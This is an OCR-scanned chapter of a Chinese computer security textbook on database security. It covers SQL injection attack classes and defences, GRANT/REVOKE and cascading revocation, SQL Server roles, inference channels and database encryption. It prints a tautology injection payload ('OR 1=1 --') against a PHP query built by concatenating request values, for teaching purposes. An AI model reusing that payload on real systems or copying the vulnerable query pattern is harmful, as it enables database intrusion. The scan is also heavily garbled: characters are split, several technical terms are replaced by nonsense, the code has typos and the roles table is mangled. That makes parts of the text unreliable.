攻击 方式 大 体 上 可 以 划分 为 三 类 ， 带 内 (inband)、 推 理 (inferential)、 带 外 (out-of-band). 

带 内 攻击 (inband attack) 使 用 同样 的 通信 信道 来 完成 注入 SQL 码 和 结果 返回 。 这 些 返 回 的 数 
据 可 以 直接 呈现 在 Web 页 面 上 。 带 内 攻击 方式 包括 以 下 几 种 : 

e BAX: 这 种 形式 的 攻击 是 将 代码 注入 一 个 或 多 个 永 真 的 条 件 表 达 式 中 。 例 如 下 面 的 

情况 ， 要 求 用 户 输入 一 个 有 效 的 名 字 和 密码 : 


$query = “SELECT info FROM user WHERE name = 
'$_GET[“name“]’ AND pwd = ‘$ GET[“pwd”]'"; 


假设 攻击 者 提交 "'OR 1 = 1 - -'" 作为 名 字 字 段 ， 查 询 的 结果 会 变 成 这 样 : 


SELECT info FROM users WHERE name = ' ‘ OR 1=1 -- AND pwpd = ‘ ' 


这 种 注入 代码 能 够 使 得 口令 检查 失效 (由 于 使 用 了 注释 符 --)， 使 整个 WHERE 语 
句 变 为 重 言 式 。 数 据 库 使 用 条 件 句 来 判断 某 一 行 是 否 为 查询 结果 ， 当 条 件 句 恒 为 真 时 ， 
查询 会 返回 表 中 所 有 的 行 。 
行 尾 注释 : 在 注入 代码 到 特定 字段 之 后 ， 字 段 之 后 的 合法 代码 会 被 注释 标记 为 空 字段 。 
比如 使 用 “ --” 会 使 得 之 后 的 查询 变 为 不 可 执行 的 注释 。 上 面 说 的 重 言 式 的 例子 也 属 
于 这 种 方式 。 
HPS: 攻击 者 在 原本 的 查询 语句 之 外 还 插入 附加 的 查询 ， 这 种 技术 依赖 于 服务 器 
的 配置 是 否 允 许 在 同一 个 字符 串 中 含有 多 个 查询 语句 。 上 一 节 提 到 的 例子 就 属于 这 种 
方式 。 
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42324 (inferential attack) 方式 ， 没 有 实际 的 数据 传输 ， 但 攻击 者 能 够 通过 发 送 特定 的 
请 求 和 观察 网 站 和 数据 库 服 务 器 的 响应 规律 来 重新 构造 信息 。 推 理 攻击 方式 包括 以 下 几 种 : 
e 非法 / 逻辑 错误 查询 : 攻击 者 将 关于 Web 应 用 程序 数据 库 后 端的 类 型 和 结构 等 重要 信 
息 收 集 起 来 ， 这 做 的 是 其 他 攻击 的 信息 收集 准备 工作 。 这 种 攻击 暴露 出 的 一 个 典型 漏 
洞 是 应 用 服务 器 返回 的 默认 错误 页 面 通常 描述 了 过 多 的 细节 内 容 。 
e 讶 SQL 注入 : 盲 SQL 注入 允许 攻击 者 推测 数据 库 系 统 中 的 数据 ， 即 使 系统 出 于 安全 
考虑 不 将 错误 查询 信息 展示 给 攻击 者 。 攻 击 者 发 送 大 量 请 求 ， 当 注入 表达 式 为 真 时 ， 
网 站 正常 运行 ， 当 注 人 表达 式 为 假 时 ， 虽 然 没 有 描述 性 的 错误 语句 ， 错 误 页 面 和 正常 
页 面 还 是 有 明显 区 别 的 。 
在 带 外 攻击 (out-of-band attack) 中 ,返回 数据 使 用 不 同 的 通信 频道 ， 比 如 一 个 带 有 查询 结 
RH Email 生成 和 返回 是 在 不 同 的 信道 进 的 。 这 一 方式 可 以 用 于 信息 检索 有 限制 但 数据 库 服务 
器 带 外 连接 不 严格 的 情况 。 


5.44 ”SQLi 应 对 措施 


由 于 SQLi 攻击 如 此 普遍 ， 破 坏 力 极 强 ， 而 且 攻 击 途 径 和 攻击 类 型 富 于 变化 ， 因 此 单一 的 
防范 策略 是 不 够 的 ， 而 使 用 集成 的 多 种 技术 是 必要 的 。 下 面 ， 我 们 将 简要 地 概述 正在 使 用 或 研 
究 中 的 各 种 SQLi 应 对 措施 。 采 用 [SHAR13] 中 提供 的 分 类 方法 ， 这 些 应 对 措施 可 分 为 3 类 : 
防御 性 编码 、 检 测 和 运行 时 阻 断 。 

许多 SQLi 攻击 之 所 以 能 够 成 功 ， 是 由 于 编码 人 员 不 良 的 编程 习惯 导致 的 。 因 此 ， 防 御 性 
编码 是 最 为 有 效 的 对 抗 方法 ， 可 见 ， 防 御 性 编码 可 以 极 大 地 减少 SQLi 导致 的 安全 威胁 。 防 御 
性 编码 的 实例 包括 : 

© 手动 防御 性 编码 实践 : SQLi 攻击 利用 的 弱点 是 不 充分 的 输入 验证 。 消 除 这 些 弱 点 的 最 
直接 的 解决 方法 是 应 用 适当 的 防御 性 编码 实践 ， 例 如 进行 输入 类 型 的 检查 ， 如 果 是 数 
值 型 输入 ， 应 该 检查 其 是 否 不 含有 字符 而 只 含有 数字 。 这 种 技术 能 够 避免 数据 库 管 理 
系统 遭受 基于 强迫 性 错误 (forcing error) 的 攻击 。 另 一 种 防御 性 编码 实践 是 进行 模式 
匹配 ， 以 便 区 分 正常 和 异常 输入 。 : 

e 参数 化 查询 插入 : 这 种 方法 尝试 允许 开发 人 员 制 定 更 为 准确 地 指定 SQL 查询 结构 ， 分 
离 传递 值 参数 以 便 不 允许 任何 不 良 的 用 户 输入 被 允许 修改 查询 结构 等 策略 ， 以 实现 避 
fa SQL 攻击 的 目的 。 

e SQL DOM : SQL DOM 是 一 组 保证 自动 数据 有 效 和 转 义 的 类 [MCCL05]。 这 种 方法 为 
访问 数据 库 提 供 一 种 安全 可 靠 的 方式 ， 它 将 查询 建立 过 程 由 使 用 字符 串 拼接 的 不 规范 
过 程 转 变 为 具有 类 型 检查 API 的 语义 构建 过 程 。 

目前 已 经 开发 了 许多 检测 方法 ， 包 括 以 下 几 种 : 

e 基于 特征 : 这 项 技术 匹配 特定 的 攻击 模式 。 这 样 的 方法 不 适用 于 经 常 更 新 的 攻击 模式 ， 
而 对 自我 修改 的 攻击 无 能 为 力 。 

e 基于 异常 : 这 种 方法 定义 了 正常 行为 模式 ， 之 后 检测 超出 行为 模式 范围 的 情况 。 目 前 
有 很 多 方法 可 以 应 用 ， 一 般 来 讲 ， 有 一 个 训练 过 程 ， 在 该 阶段 要 系统 学 习 正 常 模式 的 
范围 ， 接 下 去 才 是 真正 的 检测 阶段 。 

e 代码 分 析 : 代码 分 析 包括 一 个 测试 套件 用 于 检测 SQLi 的 漏洞 。 该 测试 套件 设计 成 能 够 
生成 许多 攻击 ， 并 评估 系统 的 响应 。 

目前 已 经 开发 出 了 许多 运行 时 阻 断 技术 用 于 对 抗 SQLi 攻击 。 这 些 技术 用 于 在 运行 时 
检测 查询 是 否 与 期 望 的 查询 模型 一 致 。 同 时 也 已 经 出 现 了 大 量 的 这 类 自动 化 工具 [CHAN12， 
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SHAR13]。 


5.5 数据库 访问 控制 


商业 的 和 开源 的 DBMS 通常 提供 对 数据 库 的 访问 控制 能 力 。DBMS 的 运行 是 基于 计算 机 
系统 已 经 鉴别 了 每 个 用 户 的 假设 的 。 计 算 机 系统 可 以 使 用 的 一 道 附 加 防线 是 用 第 4 章 描述 的 所 
有 访问 控制 机 制 来 确定 用 户 是 否 有 权限 访问 整个 数据 库 。 对 于 通过 鉴别 并 被 授权 访问 数据 库 的 
HAP, 数据库 访问 控制 系统 提供 特定 的 能 力 来 控制 用 户 访问 数据 库 的 一 部 分 。 

商业 的 和 开源 的 DBMS 提供 自主 的 或 基于 角色 的 访问 控制 。 另 外 ， 有 关 强 制 访问 控制 的 
讨论 我 们 将 放 到 第 13 章 来 讲 。 一 般 地 ，DBMS 可 以 支持 不 同 的 管理 策略 ， 这 些 策略 如 下 : 

e 集中 管理 (centralized administration): 少量 的 特权 用 户 可 以 授予 和 回收 访问 权 。 

e 基于 所 有 权 的 管理 ( ownership-based administrator): 表 的 属 主 (创建 者 ) 可 以 授予 和 回 

收 该 表 的 访问 权 。 
© 分 散 管 理 (decentralized administration): 表 的 属 主 除 了 可 以 授予 和 回收 该 表 的 访问 权 外 ， 
还 可 以 对 其 他 用 户 授 予 和 回收 授权 权 ， 以 允许 他 们 对 该 表 授 予 和 回收 访问 权 。 

和 任何 其 他 访问 控制 系统 一 样 ， 数 据 库 访问 控制 系统 区 分 不 同 的 访问 权 ， 包 括 创 建 、 插 
A, WR. Bi, BAS. AYA SHAS (DBMS) 还 就 访问 权 的 粒度 提供 了 相当 多 的 
控制 。 访 问 权 可 以 是 对 整个 数据 库 的 、 对 单个 表 的 或 者 对 表 中 选 定 的 行 或 列 的 。 访 问 权 还 可 以 
由 表 项 的 内 容 确定 。 例 如 ， 在 人 事 数 据 库 中 ， 某 些 用 户 可 能 被 限制 只 能 看 到 某 个 最 大 值 以 内 的 
工资 信息 。 部 门 经 理 可 能 仅 被 允许 看 到 他 (或 她 ) 所 管理 的 部 门 的 职工 的 工资 信息 。 


5.5.1 基于 SQL 的 访问 定义 


SQL 提供 了 用 于 管理 访问 权 的 两 个 命令 一 -GRANT H REVOKE, XF SQL 的 不 同 版 本 ， 
它们 的 语法 稍 有 不 同 。GRANT 命令 一 般 具 有 下 面 的 语法 形式 9: 


GRANT {privileges | role} 
[ON table] 

TO {user | role | PUBLIC} 
[IDENTIFIED BY password] 

[WITH GRANT OPTION] 


这 个 命令 可 以 用 来 授予 一 个 或 多 个 访问 权 或 者 为 用 户 分 配角 色 。 对 于 访问 权 ， 可 以 使 用 该 
命令 的 选项 来 指定 其 作用 的 表 。TO 子 句 指定 了 权限 被 授予 的 用 户 或 角色 。PUBLIC 值 表 示 任 
何 用 户 都 有 指定 的 访问 权 。 可 选 的 IDENTIFIED BY 子 句 指定 了 回收 这 条 GRANT 命令 的 访问 
权时 必须 使 用 的 口令 。GRANT OPTION 表示 通过 使 用 或 不 使 用 授权 选项 来 确定 被 授权 者 是 否 
可 以 再 给 其 他 用 户 授权 。 

作为 一 个 简单 的 例子 ， 考 虑 下 面 的 语句 : 

GRANT SELECT ONANY TABLE TO ricflair 

这 条 语句 使 得 用 户 ricflair 可 以 查询 数据 库 中 的 任何 表 。 

SQL 的 不 同 实现 提供 了 不 同 的 访问 权 。 下 面 是 典型 的 访问 权 列 表 : 

e Select: 被 授权 者 可 以 读 取 整个 数据 库 、 单 个 表 或 者 表 中 的 指定 列 。 

© Insert: 被 授权 者 可 以 在 表 中 插入 完整 的 行 或 者 插入 仅 对 特定 列 赋值 的 行 。 


日 ”使 用 的 语法 定义 约定 如 下 : 用 竖 线 分 开 的 元 素 是 并 列 的 选项 ， 从 中 选 一 个 ; 一 组 选项 用 花 括号 括 起 来 ; 方 


括号 里 面 是 可 选 的 元 素 ， 也 就 是 说 ， 方 括号 里 面 的 元 素 可 以 出 现 ， 也 可 以 不 出 现 。 
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e Update: 语义 类 似 于 INSERT. 

e Delete: 被 授权 者 可 以 删除 表 中 的 行 。 

e References: 被 授权 者 被 允许 定义 参照 本 表 指 定 的 列 的 另 一 个 表 的 外 键 。 
REVOKE 命令 的 语法 如 下 : 


REVOKE {privileges | role} 
[ON table] 
FROM {user | role | PUBLIC} 


因此 ， 可 以 用 下 面 的 语句 回收 前 面 例子 中 的 访问 权 : 
REVOKE SELECT ON ANY TABLE FROM ricflair 


5.5.2 ”级 联 授权 


授权 选项 (grant option) 使 得 访问 权能 够 级 联 到 很 多 用 户 。 我 们 分 析 图 5-6 中 的 访问 权 
来 说 明 级 联 现象 。 该 图 表明 Ann 在 t=10 时 刻 授予 Bob 访问 权 ， 又 在 t=20 时 刻 给 Chris 授 
权 。 假 设 授 权 选 项 总 被 使 用 ， 那 么 ，Bob 能 够 在 t=30 时 刻 给 David 授权 。Chris 在 t=50 
时 刻 也 给 David ZA. Hi, David 给 Ellen 授权 ，Ellen 又 给 Jim 授权 ; 随后 David 又 给 
Frank 授权 。 

与 使 用 授权 选项 可 以 将 授权 权 从 一 个 用 户 级 联 到 另 一 个 用 户 一 样 ， 回 收 权 也 能 级 联 。 于 
是 ， 如 果 Ann 回收 Bob 和 Chris 的 访问 权 ， 那 么 David、Ellen Jim 和 Frank 的 访问 权 也 被 回 
收 。 更 复杂 的 情况 是 一 个 用 户 多 次 得 到 同样 的 访问 权 ， 就 像 这 个 例子 中 的 David 一 样 。 假 如 
Bob 收回 David 的 权限 ， 由 于 David 在 t=50 时 刻 得 到 Chris 的 授权 ， 所 以 他 依然 拥有 访问 权 。 
然而 ，David 给 Ellen 授权 发 生 在 从 Bob 处 得 到 具有 授权 选项 的 授权 之 后 、 从 Chris 处 得 到 授权 
之 前 。 大 多 数 SQL 实现 规定 ， 在 这 种 情况 下 ， 当 Bob 收回 David 的 访问 权时 ，Ellen 以 及 Jim 
的 访问 权 也 被 收回 。 这 是 因为 在 t=40 时 刻 ，David 给 Ellen 授权 ， 此 时 David 仅 从 Bob 处 得 
到 带 授 权 选 项 的 授权 。 当 Bob 收回 权限 时 ， 导 致 后 面 所 有 经 由 David 传递 并 且 仅 能 回溯 到 Bob 
的 级 联 授 权 也 被 收回 。 因 为 David 给 Frank 授权 是 在 其 从 Chris 处 得 到 具有 授权 选项 的 授权 之 
后 ， 所 以 Frank 的 访问 权 被 保留 。 该 结果 反映 在 图 5-6 的 下 半 部 分 。 

一 般 地 ， 大 多 数 实现 遵循 如 下 约定 : 当 用 户 A 收回 访问 权时 ， 级 联 的 访问 权 也 被 收回 ， 
除非 即使 没有 最 初 A 的 授权 ， 访 问 权 也 存在 。 这 个 约定 首先 在 [GRIF76] 中 提出 。 





图 5-6 Bob 收回 David 的 权限 
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5.5.3 ”基于 角色 的 访问 控制 


基于 角色 的 访问 控制 (Role-Based Access Control, RBAC) 方案 自然 适合 于 数据 库 访 问 控 
制 。 数 据 库 系统 不 像 与 单个 或 几 个 应 用 关联 的 文件 系统 ， 经 常 要 支持 许多 应 用 。 在 这 种 环境 
下 ， 一 个 用 户 要 用 很 多 应 用 来 完成 很 多 任务 ， 每 个 任务 都 要 求 它 自己 的 特权 集 。 直 接 把 完成 所 
有 任务 所 需 的 所 有 访问 权 都 授予 用 户 是 很 糟糕 的 管理 方式 。RBAC 提供 了 一 种 既 能 减轻 管理 员 
负担 又 能 提高 安全 性 的 手段 。 
在 自主 访问 控制 环境 下 ， 我 们 可 以 把 数据 库 用 户 分 成 三 大 类 : 
e 应 用 程序 属 主 ( application owner): 拥有 数据 库 对 象 ( 表 、 列 、 行 ) 并 将 其 作为 应 用 程 
序 一 部 分 的 终端 用 户 。 也 就 是 说 ， 数 据 库 对 象 是 由 应 用 程序 产生 或 者 准备 让 应 用 程序 
使 用 的 。 

e 应 用 程序 属 主 外 的 终端 用 户 ( end user other than application owner): 不 拥有 任何 数据 库 
对 象 但 可 通过 一 个 应 用 程序 操作 数据 库 对 象 的 终端 用 户 。 

e 管理 员 (administrator): 对 数据 库 的 整体 或 者 部 分 负 有 管理 职责 的 用 户 。 

我 们 可 以 针对 这 三 种 类 型 的 用 户 对 RBAC 进行 一 些 总 体 说 明 。 一 个 应 用 程序 和 大 量 任 务 
联系 在 一 起 ， 每 个 任务 对 于 数据 库 的 一 部 分 要 求 有 特定 的 访问 权 。 对 于 每 个 任务 ， 可 以 定义 一 
个 或 多 个 角色 用 来 指定 所 需 的 访问 权 。 应 用 程序 属 主 可 以 给 终端 用 户 分 配角 色 。 管 理 员 负 责 更 
敏感 或 更 通用 的 角色 ， 这 些 角色 与 管理 物理 和 逻辑 数据 库 组 件 〈 如 数据 文件 、 用 户 和 安全 机 制 ) 
有 关 。 系 统 赋 予 某 些 管理 员 某 些 特权 。 管 理 员 又 能 给 用 户 分 配 与 管理 相关 的 角色 。 

数据 库 的 RBAC 机 制 应 该 提供 以 下 能 力 : 

e 创建 和 删除 角色 。 

e 定义 角色 的 许可 。 

e 分 配 和 取消 用 户 到 角色 的 分 配 。 

在 数据 库 安全 方面 运用 角色 的 一 个 很 好 的 例子 是 Microsoft SQL Server 提供 的 RBAC 机 制 。 
SQL Server 支持 三 种 类 型 的 角色 : 服务 器 角色 、 数 据 库 角 色 和 用 户 定义 的 角色 。 前 两 种 类 型 的 
角色 被 称 为 固定 角色 ( 详 见 表 5-2 ); 这 些 角色 是 系统 预先 配置 的 ， 具有 特定 的 访问 权 。 管 理 员 
或 普通 用 户 不 能 添加 、 删 除 或 修改 固定 角色 ， 只 能 为 用 户 添加 和 删除 固定 角色 的 成 员 资格 。 

固定 服务 器 角色 (fixed server role) 定义 在 服务 器 级 ， 独 立 于 任何 用 户 数据 库 而 存在 。 该 
类 角色 被 设计 用 来 减轻 管理 工作 量 。 它 们 具有 不 同 的 许可 ， 和 旨 在 提供 分 散 管理 职责 的 能 力 而 不 
放弃 完全 控制 。 数 据 库 管理 员 可 以 使 用 这 些 固定 角色 给 各 种 人 员 分 配 不 同 的 管理 任务 ， 并 仅仅 
授予 他 们 必须 具备 的 权限 。 

固定 数据 库 角色 (fixed database role) 运行 于 单独 的 数据 库 级 。 有 些 固定 数据 库 角色 ， 如 
db_accessadmin 和 db_secutityadmin， 和 固定 服务 器 角色 一 样 ， 被 设计 通过 委托 的 管理 职责 来 
帮助 DBA。 其 他 角色 ， 如 db datareader 和 db_datawriter， 被 设计 为 终端 用 户 提 供 一 组 许可 。 

SQL Server 允许 用 户 创建 角色 。 这 些 用 户 定义 的 角色 user-defined role) 被 分 配给 对 数据 
库 一 部 分 的 访问 权 。 具 有 适当 授权 的 用 户 (典型 地 ， 被 分 配 db_securityadmin 角色 的 用 户 ) 可 
以 定义 新 的 角色 和 与 该 角色 关联 的 访问 权 。 用 户 定义 的 角色 有 两 种 类 型 : 标准 角色 和 应 用 程序 
角色 。 对 于 标准 角色 ， 被 授权 用 户 可 以 给 其 他 用 户 分 配角 色 。 应 用 程序 角色 与 应 用 程序 关联 而 
不 与 用 户 组 关联 。 它 要 求 口令 。 角 色 当 应 用 程序 执行 适当 的 代码 时 被 激活 。 有 权 访 问 应 用 程序 
的 用 户 能 够 使 用 应 应 用 程序 角色 访问 数据 库 。 数据 库 应 用 程序 经 常 强制 要 求 它 自己 的 安全 性 建 
立 在 应 用 程序 逻辑 之 上 。 例 如 ， 你 可 以 使 用 具有 口令 的 应 用 程序 角色 来 允许 某 个 用 户 仅 在 特 
定 的 几 小 时 之 内 可 以 获取 或 修改 任何 数据 。 因 此 ， 通 过 应 用 程序 逻辑 ， 你 能 实现 更 复杂 的 安全 
管理 。 
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表 5-2 Microsoft SQL Server 中 的 固定 角色 


=a 
sysadmin 可 以 执行 SQL Server 中 的 任何 活动 ， 对 所 有 数据 库 功 能 具有 完全 控制 
可 以 设置 服务 器 范围 的 配置 选项 ， 关 闭 服务 器 
可 以 管理 链接 服务 器 和 启动 过 各 
国定 可 以 管理 登录 和 CREATE DATABASE 权限 ， 还 可 以 读 取 错 误 日 志和 修改 口令 
hg 可 以 管理 在 SQLServer 中 运行 的 进 得 
可 以 创建、 修改 和 删除 数据 库 
diskadmin 可 以 管理 磁盘 文件 
可 以 执行 BULK INSERT 语句 
具有 数据 库 的 所 有 权限 
可 以 添加 、 删 除 用 户 ID 
可 以 选择 数据 库 中 任何 用 户 表 的 所 有 数据 
可 以 修改 数据 库 的 任何 用 户 表 的 任何 数据 
数据 库 可 以 执行 所 有 的 数据 定义 语言 (DDL) 语句 
ma 可 以 管理 所 有 的 许可 、 对 象 所 有 权 、 角 色 和 角色 成 员 资格 
可 以 执行 DBCC、CHECKPOINT 和 BACKUP 语句 
没有 在 数据 库 中 选择 数据 的 权限 
没有 在 数据 库 中 修改 数据 的 权限 


5.6 ”推理 


推理 与 数据 库 安全 相关 ， 是 完成 授权 查询 并 从 得 到 的 合法 响应 中 推导 出 非 授 权 信息 的 过 
程 。 推 理 问题 产生 于 大 量 数据 项 的 组 合 比 单独 一 个 数据 项 更 加 敏感 的 情况 ， 或 者 可 以 通过 数 
据 项 组 合 推断 出 敏感 程度 更 高 的 数据 的 情况 。 图 5-7 说 明了 这 个 过 程 。 攻 击 者 可 以 利用 非 敏 感 
数据 及 元 数据 ( metadata)。 元 数据 指 有 关 数 据 项 之 间 相 关 性 或 依赖 性 的 知识 ， 可 以 用 之 来 推 
导出 某 个 用 户 不 能 用 其 他 方式 获得 的 信息 。 获 得 非 授权 数据 的 信息 传送 路 径 被 称 为 推理 通道 


(inference channel), 





图 5-7 经 由 推理 通道 的 间接 信息 访问 
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一 般 说 来 ， 可 以 用 两 种 推理 技术 推导 出 额外 信息 : 分 析 一 个 表 或 多 个 表 的 属性 之 间 的 函数 
依赖 ; 合并 具有 相同 约束 的 视图 。 

后 者 的 一 个 例子 如 图 5-8 所 示 ， 此 图 说 明了 推理 问题 。 图 5-8a 显示 了 具有 4 列 的 
Inventory 表 。 图 5-8b 显示 的 两 个 视图 ， 用 SQL 语句 定义 如 下 : 


CREATE view V1 AS CREATE view V2 AS 

SELECT Availability, Cost SELECT Item, Department 

FROM Inventory FROM Inventory 

WHERE Department = “hardware” WHERE Department = “hardware” 


这 两 个 视图 的 用 户 没 被 授权 访问 Item 和 Cost 之 间 的 关系 。 能 够 访问 其 中 一 个 视图 或 两 个 
视图 的 用 户 都 不 能 根据 函数 依赖 推导 出 二 者 的 关系 。 也 就 是 说 ， 在 Item 和 Cost 之 间 不 存在 函 
数 依赖 ， 因 而 不 能 在 已 知 Item (可 能 还 有 其 他 信息 ) 的 情况 下 就 足够 推出 Cost。 然 而 ,假设 这 
两 个 视图 是 根据 Item 和 Cost 不 能 一 起 访问 的 访问 约束 来 创建 的 。 那 么 ， 了 解 Inventory 表 结 构 
并 知道 视图 表 保 持 Inventory 表 的 行 序 的 用 户 ， 就 可 以 合并 这 两 个 视图 ， 构 造 出 如 图 5-8c 所 示 
的 表 。 这 就 违反 了 不 允许 泄露 tem 和 Cost 属性 之 间 关 系 的 访问 控制 策略 。 


[item] Availabilty Cost(S) | Department | 
Lidsuppon__— Tonine onty_[ 5.49 | hardvere- 
Cakepan T omine oniy -| T299 ser 
| Shower/tub cleaner in-store/online| 11.99 | housewares | 
[Rolling pin [in-store/online| 10.99 | housewares | 


a) Inventory# 


Availability | Cost($) | 








iem | Department | 





b) 两 个 视图 


[Tem | Availablity | Cost(S) | Department | 





[Lid support [online only | 5.49 | hardware | 
c) 从 组 合 查询 应 答 推导 出 的 表 


图 5-8 推理 的 实例 


一 般 说 来 ， 有 两 种 方法 处 理由 推理 造成 的 信息 泄露 威胁 : 

o 数据 库 设计 时 的 推理 检测 : 这 种 方法 通过 修改 数据 库 结构 或 改变 访问 控制 机 制 等 手 
段 消除 推理 通道 来 防止 推理 。 其 实例 包括 将 一 个 表 分 成 多 个 表 以 除去 数据 依赖 或 者 在 
RBAC 方案 中 使 用 更 细 粒 度 的 访问 控制 角色 。 这 类 技术 常常 导致 不 必要 的 更 严格 的 访 
问 控制 ， 从 而 降低 了 可 用 性 。 

。 查询 时 的 推理 检测 : 这 种 方法 寻求 在 一 个 查询 或 一 系列 查询 执行 期 间 消 除 推理 通道 韦 
例 。 如 果 发 现 了 推理 通道 ， 那 个 查询 就 被 拒绝 或 修改 。 

对 于 上 面 的 任何 一 种 方法 ， 都 需要 推理 检测 算法 。 这 是 个 很 复杂 的 问题 ， 仍 在 研究 当中 。 

为 了 体会 其 难度 ， 我 们 给 出 摘自 [LUNT89] 的 一 个 例子 。 考 虑 一 个 包含 人 事 信息 (包括 姓名 、 
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地 址 和 职工 工资 ) 的 数据 库 。 单 独 的 姓名 、 地 址 和 工资 信息 可 以 被 下 级 角色 (如 Clerk) 访问 ， 
但 姓名 和 工资 之 间 的 联系 则 被 限制 仅 能 由 上 级 角色 (如 Administrator) 访问 。 这 与 图 5-8 说 明 
的 问题 类 似 。 这 个 问题 的 一 种 解决 方案 是 构造 包含 如 下 信息 的 三 个 表 : 

Employees (Emp#, Name, Address) 

Salaries (S#, Salary) 

Emp-Salary (Emp#, S#) 

其 中 每 行 由 表 名 及 随后 的 列 名 清单 组 成 。 在 这 个 例子 中 ， 每 个 职工 被 分 配 了 唯一 的 职工 号 
( Emp#) 和 唯一 的 工资 号 (S#). Employees 表 和 Salaries 表 对 Clerk 角色 是 可 访问 的 ,但 Emp- 
Salary 表 仅 对 Administrator 角色 是 可 访问 的 。 在 这 个 结构 中 ， 职 工 和 工资 之 间 的 敏感 关系 是 受 
保护 的 ， 被 分 配 Clerk 角色 的 用 户 不 能 访问 。 现 在 假定 我 们 想 添 加 一 个 新 的 不 敏感 属性 一 一 职 
工 开始 工作 日 期 。 将 其 添加 到 Salaries 表 ， 如 下 所 示 : 

Employees (Emp#, Name, Address) 

Salaries (S#, Salary, Start-Date) 

Emp-Salary (Emp#, S#) 

然而 ， 职 工 的 开始 工作 日 期 是 职工 的 一 个 易于 被 观察 或 发 现 的 属性 。 因 而 ， 属 于 Clerk ff 
色 的 用 户 便 可 推理 出 (或 部 分 推理 出 ) 职工 的 名 字 。 这 将 泄露 职工 和 工资 之 间 的 关系 。 直 接 除 
去 推理 通道 的 方法 是 将 Start-Date 列 加 到 Employees 表 ， 而 不 是 加 到 Salaries 表 。 

这 个 样 例 中 指出 的 第 一 个 安全 问题 是 职工 和 工资 之 间 的 关系 可 能 被 推理 出 ， 这 可 以 通过 分 
析 数 据 结构 和 DBMS 可 用 的 安全 约束 检测 出 来 。 然 而 ， 将 Start-Date 列 加 到 Salaries 表 产 生 的 
第 二 个 安全 问题 ,不 可 能 仅 用 存储 在 数据 库 中 的 信息 检测 出 来 ， 特 别 是 对 于 数据 库 本 身 不 能 根 
据 职 工 开始 工作 日 期 推理 出 职工 姓名 。 

对 于 关系 数据 库 的 一 般 情形 ， 推 理 检 测 是 一 个 非常 复杂 和 困难 的 问题 。 对 于 第 13 章 讨论 
的 多 级 安全 数据 库 和 下 一 节 讨 论 的 统计 数据 库 ， 在 设计 具体 技术 方面 已 经 取得 了 一 些 进 展 。 


5.7 数据库 加 密 


数据 库 对 于 任何 组 织 来 说 都 是 最 可 宝贵 的 信息 源 ， 因 此 被 多 级 安全 保护 ， 包 括 防 火 墙 、 鉴 
别 机 制 、 通 用 访问 控制 系统 和 数据 库 访 问 控制 系统 。 此 外 ， 对 于 某 些 敏感 数据 ， 要 求 数据 库 加 
密 而 且 加 密 也 通常 被 实现 。 加 密 成 为 数据 库 安全 的 最 后 一 道 防 线 。 
数据 库 加 密 在 两 方面 存在 缺点 : 
o 密 钥 管理 (key management): 授权 用 户 必 须 能 够 访问 其 被 允许 访问 的 数据 的 解密 密 钥 。 
因为 数据 库 一 般 可 供 大 量 用 户 和 众多 应 用 访问 ， 为 授权 的 用 户 和 应 用 提供 数据 库 选 定 
部 分 的 安全 密 钥 是 一 项 复杂 的 工作 。 
© 不 灵活 (inflexibility): 当 数 据 库 的 部 分 或 全 部 被 加 密 时 ， 执 行 记录 搜索 变 得 更 为 困难 。 
加 密 可 以 在 记录 级 (加密 选 定 的 记录 )、 属 性 级 (加密 选 定 的 列 ) 或 单个 字段 级 运用 到 整个 
数据 库 。 
许多 方法 已 被 应 用 于 数据 库 加 密 。 本 节 中 ， 我 们 分 析 多 用 户 数 据 库 的 一 种 典型 方法 。 
DBMS 是 硬件 和 软件 的 复杂 集合 。 它 需要 很 大 的 存储 容量 ， 并 需要 熟练 的 工作 人 员 完 成 
维护 、 灾 难保 护 、 更 新 与 安全 等 工作 。 对 于 很 多 小 型 和 中 型 组 织 ， 一 个 有 吸引 力 的 解决 方案 
是 从 服务 提供 商 处 外 购 DBMS 和 数据 库 。 服 务 提 供 商 远程 维护 数据 库 ， 其 可 以 提供 高 可 用 性 、 
灾难 预防 和 高 效 访 问 与 更 新 。 在 这 个 解决 方案 中 ， 主 要 需要 关心 数据 的 机 密 性 。 
这 个 安全 问题 的 直接 解决 方法 是 加 密 整 个 数据 库 ， 并 且 不 向 服务 提供 商 提供 加 密 /解密 密 
钥 。 这 个 解决 方案 本 身 很 不 灵活 。 用 户 具 有 有 限 的 能 力 在 搜索 或 索引 密 钥 参 数 基础 上 访问 一 个 
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数据 项 ， 但 必须 从 数据 库 中 下 载 全 部 表 ， 解 密 这 些 表 ， 再 对 结果 进行 处 理 。 为 了 提供 更 好 的 灵 
活性 ， 必 须 能 够 直接 对 加 密 形 式 的 数据 库 进 行 处 理 。 
[DAMI05] 和 [DAMI03] 介绍 了 采用 这 种 方法 的 一 个 例子 ， 如 图 5-9 所 示 。[HACI02] 也 描 
述 了 一 种 类 似 的 方法 。 其 中 涉及 四 种 实体 : 
e 数据 主 (data owner): 对 于 组 织 内 部 或 外 部 的 用 户 ， 产 生 版 本 可 控 的 数据 的 组 织 。 
e FAR (user): 对 系统 提出 请 求 (查询 ) 的 人 实体 (human entity)。 用 户 可 以 是 组 织 内 部 的 职 
工 ， 被 授权 通过 服务 器 访问 数据 库 ; 或 者 是 组 织 外 部 的 人 ， 经 鉴别 之 后 被 授予 访问 权 。 
© 客户 端 (client): 把 用 户 查询 转换 为 在 服务 器 中 加 密 存储 的 查询 的 前 端 。 
© 服务 器 (server): 接收 来 自 数据 主 的 加 密 数据 并 分 发 给 客户 的 组 织 。 服 务 器 可 以 实际 被 
数据 主 拥有 ， 但 更 多 情况 下 它 是 被 外 部 提供 者 拥有 并 维护 的 设施 。 
让 我 们 首先 分 析 基 于 这 个 情景 的 最 简单 的 可 能 安排 。 假 设 数据 库 中 的 每 个 项 使 用 相同 的 加 
密 密 钥 分 别 加 密 。 加 密 的 数据 库存 储 在 服务 器 中 ， 但 由 于 服务 器 没有 密 钥 ， 所 以 数据 在 服务 器 
中 是 安全 的 。 即 使 有 人 能 够 攻 和 人 服务 器 系统 ， 他 能 够 访问 的 都 是 加 密 的 数据 。 客 户 端 系统 拥有 
加 密 密 钥 的 副本 。 客 户 端的 用 户 可 以 按照 下 面 的 顺序 从 数据 库 中 检索 记录 : 
1. 用 户 发 布 一 条 SQL 查询 ， 请 求 主 键 具有 特定 值 的 一 条 或 多 条 记录 的 字段 。 
2. 客户 端的 查询 处 理 器 加 密 主键 ， 并 相应 地 修改 SQL 查询 ， 进 而 把 查询 传送 给 服务 器 。 
3. 服务 器 处 理 主键 被 加 密 的 查询 ， 返 回 正确 的 记录 。 
